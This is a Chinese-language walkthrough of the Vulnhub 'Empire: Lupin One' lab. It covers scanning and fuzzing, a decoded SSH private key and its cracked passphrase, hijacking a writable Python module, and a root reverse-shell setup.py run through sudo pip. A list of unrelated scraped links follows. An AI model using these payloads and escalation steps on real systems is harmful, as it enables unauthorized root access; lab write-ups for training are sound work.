kali攻击机ip :192.168.181.129

忘记打开nat模式了,用的桥接模式,懒得重启了,反正ip已经告诉我们了,那就先用着吧

端口扫描(有点慢)

nmap -sS   -p 1-65535 -A 192.168.1.108

查看80端口

别放弃!

目录扫描

disallow,不信,我要看看

看看页面源代码,叫我们继续尝试

那就再扫扫这个目录

 wfuzz  --hw 31 -w /home/user/fuzzDicts-master/directoryDicts/Filenames_or_Directories_All.txt  -u http://192.168.1.108/~myfiles/FUZZ

啥都没有

根目录也扫扫

wfuzz  --hw 31 -w /home/user/fuzzDicts-master/directoryDicts/Filenames_or_Directories_All.txt  -u http://192.168.1.108/FUZZ

啥都没有

难道要跟着这个~myfiles一样的格式?试试吧

 wfuzz  --hw 31 -w /home/user/fuzzDicts-master/directoryDicts/Filenames_or_Directories_All.txt  -u http://192.168.1.108/~FUZZ

居然有了,这哥们有强迫症啊

~secret

有几个重点:

  • 作者弄了一个ssh私钥文件,放在这里一个隐蔽的地方

  • crack passphrase with fasttrack

  • 作者名叫icex4

先查查这个fasttrack是啥

一开始我还以为是个类似hydra的密码爆破的工具,后来发现这是kali自带的一个字典文件fasttrack.txt

想偷懒试试直接爆破ssh密码

果然没这么轻松=_=

再看看别的吧

回到ssh私钥,可能在这个url目录底下藏着

继续使用wfuzz模糊测试

先试试正常的小字典,.txt后缀

wfuzz --hw 31,28 -w /home/user/SecLists-master/Discovery/Web-Content/directory-list-2.3-small.txt -u http://192.168.1.108/~secret/FUZZ.txt

不行

换个后缀也不行,.php,.html都试过了,都不行

不会是字典问题吧,可是大字典要跑好久好久=_=(而且wfuzz和dirbuster经常没跑完就停了,别问我怎么知道的)

不会这么为难人吧,应该是别的地方出问题了

提示里面说了个hidden,有点提醒到我了,难道这个私钥文件还是个.开头的隐藏文件?

wfuzz --hw 31 -w /home/user/SecLists-master/Discovery/Web-Content/directory-list-2.3-small.txt -u http://192.168.1.108/~secret/.FUZZ.txt

终于,有一个.mysecret.txt文件浮出水面

其实还有一个fuzz的工具也挺好用的,叫ffuf,kali自带的。

ffuf可以一次性指定多个文件后缀爆破,不用像wfuzz和dirbuster一样要一个个试;而且我用大字典ffuf也能跑完,就是时间有点久,要有耐心

查看.mysecret.txt

可是一看就不对劲啊,私钥哪是长这样的,一般格式都是开头有个----- BENGIN xxx PRIVATE KEY-----,然后结尾就是-----END xxx PRIVATE KEY-----这样的吧

所以很大可能是编码过的

这个网站有各种密码的解码工具

解码平台

一个一个试吧=_=,我是真看不出来这是啥编码方式

试出来了!是base58!确实没见过

这才像样嘛

-----BEGIN OPENSSH PRIVATE KEY-----
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
iUJ66WmRUN9EoVlkeCzQJwivI=
-----END OPENSSH PRIVATE KEY-----

写入文件

vim id_openssh

缩小密钥文件权限,不然会报错

 chmod 600 id_openssh

还要密码,看来设置了私钥+密码登录ssh

使用john爆破密码

安全工具——John the Ripper - 先知社区 (aliyun.com)

如何使用开膛手约翰破解SSH私钥密码 « 空字节 :: WonderHowTo

john识别不了id_openssh,需要将密钥文件转换为john兼容的攻击文件

ssh2john /home/user/vulnhub_p_u/empire_lupinone/id_openssh > passwd.hash


john  --wordlist=/usr/share/wordlists/fasttrack.txt  /home/user/vulnhub_p_u/empire_lupinone/passwd.hash

P@55w0rd!

ssh  icex64@192.168.1.108  -i id_openssh

既然有密码,那就查看一下suid权限命令

sudo -l

一个py文件,引入了webbrowser包,输出一句话,并且打开作者的网站

查看用户目录

cd /home
ls
cd arsene/
ls

发现了两个文件,其中一个就是sudo -l发现的root权限命令

查看note.txt

你能帮忙检查我的代码是否可以安全运行吗,我需要用于我的下一次抢劫。

我不想让其他人进入它,因为它可能会危及我的帐户并找到我的秘密文件。

只有您可以访问我的程序,因为我知道您的帐户是安全的。

另一边见。

heist.py root权限可读写

查看隐藏文件,secret欸

都没权限查看

回去icex64的目录查看

cd icex64


cat user.txt

一顶帅气的帽子,还有一行字符串

3mp!r3{I_See_That_You_Manage_To_Get_My_Bunny}

可能是密码?

不是arsene的登录密码

查看隐藏目录,查看bash日志,发现icex64登录过root想尝试刚刚的密码是不是root密码

cat .bash_history

想尝试刚刚的密码是不是root密码

好吧也不是

有点懵逼,信息收集的差不多了,但是感觉无从下手

只能回去看看刚刚的信息还有什么没用上

遗漏了这个webbrowser包,一开始就发现了,但没有深入查看

查找webbrowser包路径

webbrowser.py拥有好高的权限,普通用户都可以写入,那我就不客气了

cat webbrowser.py

因为heist.py脚本中调用了webbrowser.open(),所以我选择在open函数里面插入os.system("/bin/sh")提权命令;当heist.py执行open()时,就能切换到arsene用户的shell

因为是利用arsene权限执行,所以要写成sudo - u arsene

sudo -u arsene  /usr/bin/python3.9 /home/arsene/heist.py

弄个回显 python3 -c 'import pty;pty.spawn("/bin/bash")'\;

第一时间去看.secret,虽然不知道有啥用

rQ8EE"UK,eV)weg~nd-`5:{"j7*Q

sudo -l

可以以root身份执行pip

pip提权

在执行pip install时会调用setup.py,可以在本地创建恶意setup.py文件来达到任意命令执行的效果

写入py脚本,我是直接在/home目录下新建文件的,别的地方没试过,不知道行不行

cd /hometouch setup.pyvi setup.py

from setuptools import setup
from setuptools.command.install import install
import os, socket, subprocessclass CustomInstall(install):def run(self):install.run(self)s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("127.0.0.1",1234))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)p=subprocess.call(["/bin/sh","-i"])setup(name='FakePip',version='0.0.1',description='Reverse shell',url='xx.xx.xx.xx',author='nathan',author_email='xx@xx',license='MIT',zip_safe=False,cmdclass={'install': CustomInstall})

kali打开nc监听1234端口

使用命令强制pip重新安装当前版本

sudo pip install . --upgrade --force-reinstall

连上了,获得root权限

获得flag,不过这个3mp!r3到底是啥玩意啊??!!!!

o了

01-Empire-Lupin-One vulnhub靶场(ssh2john)相关推荐

  1. 01 - Empire Lupin One

    目录 一.信息收集 二.漏洞发现 三.权限提升 总结 一.信息收集 常规的主机发现以及端口扫描,扫描自己所在的网段. nmap 192.168.216.0/24 nmap -A -v -T4 -p 1 ...

  2. 靶机11 Empire Lupin One

    总结 本次靶机涉及信息泄露漏洞,系统配置漏洞,sudo 提权 ffuf 工具暴力破解目录 在线识别算法:https://www.dcode.fr/cipher-identifier ssh2john工 ...

  3. vulnhub靶场,Monitoring

    vulnhub靶场,Monitoring 环境准备 靶机下载地址:https://www.vulnhub.com/entry/monitoring-1,555/ 攻击机:kali(192.168.10 ...

  4. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  5. vulnhub靶场,covfefe

    vulnhub靶场,covfefe 环境准备 靶机下载地址:https://www.vulnhub.com/entry/covfefe-1,199/ 攻击机:kali(192.168.109.128) ...

  6. 靶场练习第一天~vulnhub靶场之Me-and-My-Girlfriend-1

    兄弟们第一天打vulnhub靶场,我kali连靶场ip都扫不到,泪奔了,不说了开整 注意: vm虚拟机里面的编辑下面的虚拟机网络编辑器,把除了NAT模式外的模式,其他模式不启动. 至于为什么要这样操作 ...

  7. VulnHub靶场系列:Flick

    VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来. 环境部署: 下载靶场并导入到VMware中: https: ...

  8. Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

    Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...

  9. vulnhub靶场,bulldog1

    vulnhub靶场,bulldog1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/ 攻击机:kali(192.168.109.128 ...

最新文章

  1. 重磅直播|多模态融合SLAM技术分享!
  2. 高清SDI编码器|上海视涛科技
  3. 数据结构源码笔记(C语言):集合的位向量表示
  4. Hadoop1.1.2 Eclipse 插件编译
  5. 邱锡鹏教授--神经网络和深度学习(一)
  6. 爬虫 spider09——爬取指定数据,去重复,并存储到mysql
  7. python数据类型总结_Python 数据类型总结
  8. 动态规划 —— 背包问题
  9. 常见数据结构List之LinkedList
  10. python如何屏幕截图_Python编写屏幕截图程序方法
  11. [原创]Silverlight与SQLite数据库的互操作(CURD完全解析)[Final]
  12. 你要小心那些涉世不深的老实人
  13. [953]mongo创建索引及索引相关方法
  14. Vue进阶(幺零三):Markdown 基本语法
  15. HEVC帧间预测原理
  16. 『 云原生·Docker』虚拟机与容器
  17. motan学习笔记 一 微博轻量级RPC框架Motan
  18. [048量化交易]python获取股票 量比 换手率 市盈率-动态 市净率 总市值 流通市值写入数据库MongoDB
  19. 如何快速找出电脑里的所有视频\照片\文件
  20. 再见!永远的21号!马刺退役邓肯21号球衣

热门文章

  1. 最短路 dij floy spfa
  2. 关于ADFS的局限性,你了解多少?
  3. 人工智能证书有什么作用?
  4. 四个福利性在线网站分享,每一个都让你欲罢不能……
  5. 使用GDB调试Linux内核空指针问题
  6. 科技作者吴军:不用低效率的算法做事情
  7. linux修改配置文件configure,./configure 的配置和用法
  8. Xshell国内免费下载
  9. error: dst ref refs/heads/dev receives from more than one src.
  10. vbs可以调用python脚本吗?